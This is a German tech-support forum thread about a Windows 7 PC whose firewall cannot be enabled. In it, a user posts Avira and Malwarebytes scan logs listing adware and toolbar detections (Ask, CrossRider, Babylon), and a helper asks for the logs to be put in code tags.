Der Suchlauf über gestartete Prozesse wird begonnen:
Durchsuche Prozess 'svchost.exe' - '52' Modul(e) wurden durchsucht
Durchsuche Prozess 'nvvsvc.exe' - '35' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '36' Modul(e) wurden durchsucht
Durchsuche Prozess 'MsMpEng.exe' - '87' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '98' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '109' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '160' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '82' Modul(e) wurden durchsucht
Durchsuche Prozess 'NvXDSync.exe' - '41' Modul(e) wurden durchsucht
Durchsuche Prozess 'nvvsvc.exe' - '50' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '74' Modul(e) wurden durchsucht
Durchsuche Prozess 'spoolsv.exe' - '86' Modul(e) wurden durchsucht
Durchsuche Prozess 'sched.exe' - '92' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '49' Modul(e) wurden durchsucht
Durchsuche Prozess 'armsvc.exe' - '28' Modul(e) wurden durchsucht
Durchsuche Prozess 'avguard.exe' - '118' Modul(e) wurden durchsucht
Durchsuche Prozess 'apnmcp.exe' - '36' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '61' Modul(e) wurden durchsucht
Durchsuche Prozess 'PassThruSvr.exe' - '22' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskhost.exe' - '53' Modul(e) wurden durchsucht
Durchsuche Prozess 'Explorer.EXE' - '176' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '37' Modul(e) wurden durchsucht
Durchsuche Prozess 'Dwm.exe' - '31' Modul(e) wurden durchsucht
Durchsuche Prozess 'RichVideo.exe' - '28' Modul(e) wurden durchsucht
Durchsuche Prozess 'sftvsa.exe' - '32' Modul(e) wurden durchsucht
Durchsuche Prozess 'WLIDSVC.EXE' - '75' Modul(e) wurden durchsucht
Durchsuche Prozess 'RAVCpl64.exe' - '47' Modul(e) wurden durchsucht
Durchsuche Prozess 'SynTPEnh.exe' - '56' Modul(e) wurden durchsucht
Durchsuche Prozess 'AmazonMP3DownloaderHelper.exe' - '46' Modul(e) wurden durchsucht
Durchsuche Prozess 'GoogleCrashHandler.exe' - '34' Modul(e) wurden durchsucht
Durchsuche Prozess 'GoogleCrashHandler64.exe' - '29' Modul(e) wurden durchsucht
Durchsuche Prozess 'soffice.exe' - '24' Modul(e) wurden durchsucht
Durchsuche Prozess 'soffice.bin' - '97' Modul(e) wurden durchsucht
Durchsuche Prozess 'jusched.exe' - '29' Modul(e) wurden durchsucht
Durchsuche Prozess 'avgnt.exe' - '129' Modul(e) wurden durchsucht
Durchsuche Prozess 'TBNotifier.exe' - '81' Modul(e) wurden durchsucht
Durchsuche Prozess 'WLIDSvcM.exe' - '17' Modul(e) wurden durchsucht
Durchsuche Prozess 'Avira.Systray.exe' - '65' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskeng.exe' - '30' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskeng.exe' - '31' Modul(e) wurden durchsucht
Durchsuche Prozess 'YCMMirage.exe' - '40' Modul(e) wurden durchsucht
Durchsuche Prozess 'dmhkcore.exe' - '59' Modul(e) wurden durchsucht
Durchsuche Prozess 'WifiManager.exe' - '47' Modul(e) wurden durchsucht
Durchsuche Prozess 'srspanel_64.exe' - '43' Modul(e) wurden durchsucht
Durchsuche Prozess 'sftlist.exe' - '67' Modul(e) wurden durchsucht
Durchsuche Prozess 'CVHSVC.EXE' - '65' Modul(e) wurden durchsucht
Durchsuche Prozess 'avshadow.exe' - '21' Modul(e) wurden durchsucht
Durchsuche Prozess 'avwebg7.exe' - '62' Modul(e) wurden durchsucht
Durchsuche Prozess 'SearchIndexer.exe' - '54' Modul(e) wurden durchsucht
Durchsuche Prozess 'SynTPHelper.exe' - '17' Modul(e) wurden durchsucht
Durchsuche Prozess 'wmpnetwk.exe' - '116' Modul(e) wurden durchsucht
Durchsuche Prozess 'firefox.exe' - '156' Modul(e) wurden durchsucht
Durchsuche Prozess 'WCScheduler.exe' - '61' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '59' Modul(e) wurden durchsucht
Durchsuche Prozess 'SmartRestarter.exe' - '35' Modul(e) wurden durchsucht
Durchsuche Prozess 'CLMLSvc.exe' - '40' Modul(e) wurden durchsucht
Durchsuche Prozess 'Media+Player10Serv.exe' - '31' Modul(e) wurden durchsucht
Durchsuche Prozess 'EasySpeedUpManager.exe' - '38' Modul(e) wurden durchsucht
Durchsuche Prozess 'MovieColorEnhancer.exe' - '45' Modul(e) wurden durchsucht
Durchsuche Prozess 'SSCKbdHk.exe' - '33' Modul(e) wurden durchsucht
Durchsuche Prozess 'LMS.exe' - '33' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '50' Modul(e) wurden durchsucht
Durchsuche Prozess 'UNS.exe' - '45' Modul(e) wurden durchsucht
Durchsuche Prozess 'svchost.exe' - '28' Modul(e) wurden durchsucht
Durchsuche Prozess 'SUPBackground.exe' - '59' Modul(e) wurden durchsucht
Durchsuche Prozess 'mbam.exe' - '115' Modul(e) wurden durchsucht
Durchsuche Prozess 'mbamresearch.exe' - '60' Modul(e) wurden durchsucht
Durchsuche Prozess 'avscan.exe' - '113' Modul(e) wurden durchsucht
Durchsuche Prozess 'smss.exe' - '2' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '18' Modul(e) wurden durchsucht
Durchsuche Prozess 'wininit.exe' - '26' Modul(e) wurden durchsucht
Durchsuche Prozess 'csrss.exe' - '18' Modul(e) wurden durchsucht
Durchsuche Prozess 'services.exe' - '33' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsass.exe' - '73' Modul(e) wurden durchsucht
Durchsuche Prozess 'lsm.exe' - '16' Modul(e) wurden durchsucht
Durchsuche Prozess 'winlogon.exe' - '31' Modul(e) wurden durchsucht

Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'C:\Users\Steffen\AppData\Local\Temp\OCS\ocs_v71a.exe'
C:\Users\Steffen\AppData\Local\Temp\OCS\ocs_v71a.exe
  [FUND]      Enthält Muster der Software PUA/DownloadSponsor.Gen
  [HINWEIS]   Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '4bbc50de.qua' verschoben!


Ende des Suchlaufs: Sonntag, 6. Dezember 2015  08:51
Benötigte Zeit: 01:21 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

      0 Verzeichnisse wurden überprüft
    914 Dateien wurden geprüft
      1 Viren bzw. unerwünschte Programme wurden gefunden
      0 Dateien wurden als verdächtig eingestuft
      0 Dateien wurden gelöscht
      0 Viren bzw. unerwünschte Programme wurden repariert
      1 Dateien wurden in die Quarantäne verschoben
      0 Dateien wurden umbenannt
      0 Dateien konnten nicht durchsucht werden
    913 Dateien ohne Befall
      3 Archive wurden durchsucht
      0 Warnungen
      1 Hinweise
         
Malware Log ist scheinbar zu lang
__________________

Alt 06.12.2015, 15:22   #4
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



hoffe das es mit dem zip ordner geklappt hat

Alt 06.12.2015, 15:55   #5
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 06.12.2015, 17:55   #6
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Hallo Cosinus,

erstmal ein großes Danke das du dich meines Problemes annimmst. Die Log Datei von Malware ist leider zu groß für einen einzelnen Post in den .

Ich dachte das es über die Zip Datei einfacher erscheint. Tut mir leid wenn dein Aufwand dadurch steigt. Das soll er nicht. Sag mir doch bitte wie ich dir die Datei von Malware zukommen lassen kann, damit keine Mehrarbeit für dich entsteht.

Soll ich sie einfach als Text hier Posten?

Alt 06.12.2015, 23:50   #7
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Lies dochmal ganz aufmerksam meinen Beitrag mit dem Lesestoff zu CODE-Tags. So schwer kann das nicht sein.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 07.12.2015, 09:07   #8
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Okay, ich habe jetzt den Log der Malware halbiert. Hier der erste Teil


Code:
ATTFilter
<?xml version="1.0" encoding="UTF-16" ?>
<mbam-log>
<header>
<date>2015/12/06 08:32:20 +0100</date>
<logfile>mbam-log-2015-12-06 (08-32-17).xml</logfile>
<isadmin>yes</isadmin>
</header>
<engine>
<version>2.2.0.1024</version>
<malware-database>v2015.12.06.01</malware-database>
<rootkit-database>v2015.11.26.01</rootkit-database>
<license>free</license>
<file-protection>disabled</file-protection>
<web-protection>disabled</web-protection>
<self-protection>disabled</self-protection>
</engine>
<system>
<hostname>STEFFEN-PC</hostname>
<ip>192.168.178.38</ip>
<osversion>Windows 7</osversion>
<arch>x64</arch>
<username>Steffen</username>
<filesys>NTFS</filesys>
</system>
<summary>
<type>threat</type>
<result>completed</result>
<objects>349604</objects>
<time>1946</time>
<processes>2</processes>
<modules>0</modules>
<keys>43</keys>
<values>14</values>
<datas>0</datas>
<folders>58</folders>
<files>352</files>
<sectors>0</sectors>
</summary>
<options>
<memory>enabled</memory>
<startup>enabled</startup>
<filesystem>enabled</filesystem>
<archives>enabled</archives>
<rootkits>disabled</rootkits>
<deeprootkit>disabled</deeprootkit>
<heuristics>enabled</heuristics>
<pup>warn</pup>
<pum>enabled</pum>
</options>
<items>
<process><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><pid>3508</pid><hash>b623dac7f9921d1920c8574c14eed828</hash></process>
<process><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>delete-on-reboot</action><pid>1556</pid><hash>fbde6c35c5c696a078714d56cf3309f7</hash></process>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{c2d64ff7-0ab8-4263-89c9-ea3b0f8f050c}</path><vendor>PUP.Optional.MediaBar</vendor><action>success</action><hash>3f9adfc2c3c8290d77bf4cffb34f728e</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{C2D64FF7-0AB8-4263-89C9-EA3B0F8F050C}</path><vendor>PUP.Optional.MediaBar</vendor><action>success</action><hash>3f9adfc2c3c8290d77bf4cffb34f728e</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}</path><vendor>PUP.Optional.Babylon</vendor><action>success</action><hash>c3162d74becdc4721631d67262a0c937</hash></key>
<key><path>HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\AAAAACALGEBMFELLLFIAOKNIFLDPNGJH</path><vendor>PUP.Optional.ASKPartnerNetwork</vendor><action>success</action><hash>c514c5dc048788ae73ace5d746bd847c</hash></key>
<key><path>HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{9BB47C17-9C68-4BB3-B188-DD9AF0FD22}</path><vendor>PUP.Optional.SearchResults</vendor><action>success</action><hash>9049bee35a311c1aab6e95137c877987</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\dhdepfaagokllfmhfbcfmocaeigmoebo</path><vendor>PUP.Optional.SavingsSidekick</vendor><action>success</action><hash>8e4be7ba88033ff768b11f88a3605da3</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\AAAAACALGEBMFELLLFIAOKNIFLDPNGJH</path><vendor>PUP.Optional.ASKPartnerNetwork</vendor><action>success</action><hash>dffa5150f3980a2cd44b7a42b152db25</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{21111111-1111-1111-1111-110011501160}</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>ab2ed9c88ffc48eef1fcfd8831d25fa1</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{BA7263EA-06CF-412C-B756-DBC00A046E7B}</path><vendor>PUP.Optional.Bandoo.AppFlsh</vendor><action>success</action><hash>7c5d1f829bf0cc6a0028f8fd49ba05fb</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{9BB47C17-9C68-4BB3-B188-DD9AF0FD22}</path><vendor>PUP.Optional.SearchResults</vendor><action>success</action><hash>02d7b9e8ff8c54e2b46596121be8b54b</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{41564952-412D-5637-00A7-A758B70C2500}</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>0acf38695239ed492ef08834a75c0cf4</hash></key>
<key><path>HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\APNMCP</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>fbde6c35c5c696a078714d56cf3309f7</hash></key>
<key><path>HKU\S-1-5-18\SOFTWARE\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>2eabdbc6aae1b0861ec8bbe836ccd828</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\AskPartnerNetwork</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>6d6cb6eb1774f4422db9ced506fc0000</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\InstallCore</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>f8e131702f5c2d099cbc345f47bc3dc3</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\APPDATALOW\SOFTWARE\Crossrider</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>c7125150cac162d402bbc3c128db3dc3</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\APPDATALOW\SOFTWARE\Savings Sidekick</path><vendor>PUP.Optional.SavingsSidekick</vendor><action>success</action><hash>11c8abf690fb9d9901151a8d996a4eb2</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\CR_INSTALLER\5060</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>627790115338a78f3f8b582c5ba8b44c</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\INSTALLEDBROWSEREXTENSIONS\215 Apps</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>b425a001c6c5cd69b819b3d17b88ec14</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\PERFORMERSOFT LLC\Video Performer</path><vendor>PUP.Optional.VideoPerformer</vendor><action>success</action><hash>eaefbfe21f6cb284c7e9bef59a6904fc</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\SYSTWEAK\RegClean Pro</path><vendor>PUP.Optional.RegCleanerPro</vendor><action>success</action><hash>6376633e6b20b284526dc7dd3bc829d7</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{D8278076-BC68-4484-9233-6E7F1628B56C}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{D8278076-BC68-4484-9233-6E7F1628B56C}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\TYPELIB\{9945959C-AAD8-4312-8B57-2DE11927E770}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{BD125908-5F10-409F-9C01-F2207CA18887}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{BD125908-5F10-409F-9C01-F2207CA18887}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{9945959C-AAD8-4312-8B57-2DE11927E770}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{9945959C-AAD8-4312-8B57-2DE11927E770}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\TYPELIB\{EEA63863-87BC-4DCA-A5B5-EB97E3B04806}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{80703783-E415-4EE3-AB60-D36981C5A6F1}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{80703783-E415-4EE3-AB60-D36981C5A6F1}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{EEA63863-87BC-4DCA-A5B5-EB97E3B04806}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{EEA63863-87BC-4DCA-A5B5-EB97E3B04806}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{80703783-E415-4EE3-AB60-D36981C5A6F1}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{80703783-E415-4EE3-AB60-D36981C5A6F1}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\CLSID\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\CLSID\{41564952-412D-5637-00A7-7A786E7484D7}\INPROCSERVER32</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<key><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{41564952-412D-5637-00A7-7A786E7484D7}</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></key>
<value><path>HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\aaaaacalgebmfelllfiaoknifldpngjh</path><valuename>path</valuename><vendor>PUP.Optional.ASKPartnerNetwork</vendor><action>success</action><valuedata>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX\ToolbarCR.crx</valuedata><hash>c514c5dc048788ae73ace5d746bd847c</hash></value>
<value><path>HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{9BB47C17-9C68-4BB3-B188-DD9AF0FD22}</path><valuename>URL</valuename><vendor>PUP.Optional.SearchResults</vendor><action>success</action><valuedata>hxxp://dts.search-results.com/sr?src=ieb&amp;appid=876&amp;systemid=2&amp;sr=0&amp;q={searchTerms}</valuedata><hash>9049bee35a311c1aab6e95137c877987</hash></value>
<value><path>HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{9BB47C17-9C68-4BB3-B188-DD9AF0FD22}</path><valuename>SuggestionsURL_JSON</valuename><vendor>PUP.Optional.SearchQu</vendor><action>success</action><valuedata>hxxp://www.searchqu.com/suggest.php?src=ieb&amp;appid=876&amp;systemid=2&amp;qu={searchTerms}&amp;ft=json</valuedata><hash>9247c5dcd2b98bab4ec8ecbc09fa4eb2</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\aaaaacalgebmfelllfiaoknifldpngjh</path><valuename>path</valuename><vendor>PUP.Optional.ASKPartnerNetwork</vendor><action>success</action><valuedata>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\CRX\ToolbarCR.crx</valuedata><hash>dffa5150f3980a2cd44b7a42b152db25</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{21111111-1111-1111-1111-110011501160}</path><valuename>AppName</valuename><vendor>PUP.Optional.CrossRider</vendor><action>success</action><valuedata>Savings Sidekick-bg.exe</valuedata><hash>ab2ed9c88ffc48eef1fcfd8831d25fa1</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{BA7263EA-06CF-412C-B756-DBC00A046E7B}</path><valuename>AppPath</valuename><vendor>PUP.Optional.Bandoo.AppFlsh</vendor><action>success</action><valuedata>C:\PROGRA~2\BEARSH~1\MediaBar\Datamngr\ToolBar</valuedata><hash>7c5d1f829bf0cc6a0028f8fd49ba05fb</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{9BB47C17-9C68-4BB3-B188-DD9AF0FD22}</path><valuename>URL</valuename><vendor>PUP.Optional.SearchResults</vendor><action>success</action><valuedata>hxxp://dts.search-results.com/sr?src=ieb&amp;appid=876&amp;systemid=2&amp;sr=0&amp;q={searchTerms}</valuedata><hash>02d7b9e8ff8c54e2b46596121be8b54b</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{9BB47C17-9C68-4BB3-B188-DD9AF0FD22}</path><valuename>SuggestionsURL_JSON</valuename><vendor>PUP.Optional.SearchQu</vendor><action>success</action><valuedata>hxxp://www.searchqu.com/suggest.php?src=ieb&amp;appid=876&amp;systemid=2&amp;qu={searchTerms}&amp;ft=json</valuedata><hash>9d3c950cadde6acc69adbaee669dbe42</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN</path><valuename>ApnTBMon</valuename><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><valuedata>&quot;C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe&quot;</valuedata><hash>b623dac7f9921d1920c8574c14eed828</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{41564952-412D-5637-00A7-A758B70C2500}</path><valuename>InstallSource</valuename><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><valuedata>C:\ProgramData\APN\APN-Stub\AVIRA-V7\</valuedata><hash>0acf38695239ed492ef08834a75c0cf4</hash></value>
<value><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\INSTALLEDBROWSEREXTENSIONS\215 APPS</path><valuename>5060</valuename><vendor>PUP.Optional.CrossFire.SA</vendor><action>success</action><valuedata>Savings Sidekick</valuedata><hash>a138ddc483082115364ae754f310857b</hash></value>
<value><path>HKU\S-1-5-21-336442205-827502387-1674173946-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}</path><valuename>URL</valuename><vendor>PUP.Optional.Babylon</vendor><action>success</action><valuedata>hxxp://search.babylon.com/?q={searchTerms}&amp;affID=110819&amp;tt=010712_3&amp;babsrc=SP_ss&amp;mntrId=16123040000000000000062454f2a604</valuedata><hash>d900efb2612a04324a233940aa594ab6</hash></value>
<value><path>HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR</path><valuename>{41564952-412D-5637-00A7-7A786E7484D7}</valuename><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><valuedata>0</valuedata><hash>a336a001464561d5db2d5f0f738f24dc</hash></value>
<value><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR</path><valuename>{41564952-412D-5637-00A7-7A786E7484D7}</valuename><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><valuedata>0</valuedata><hash>a336a001464561d5db2d5f0f738f24dc</hash></value>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\skin</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
<folder><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\extensions\crossriderapp5060@crossrider.com\chrome\content</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>05d458494c3f181e2dee93f04bb8ea16</hash></folder>
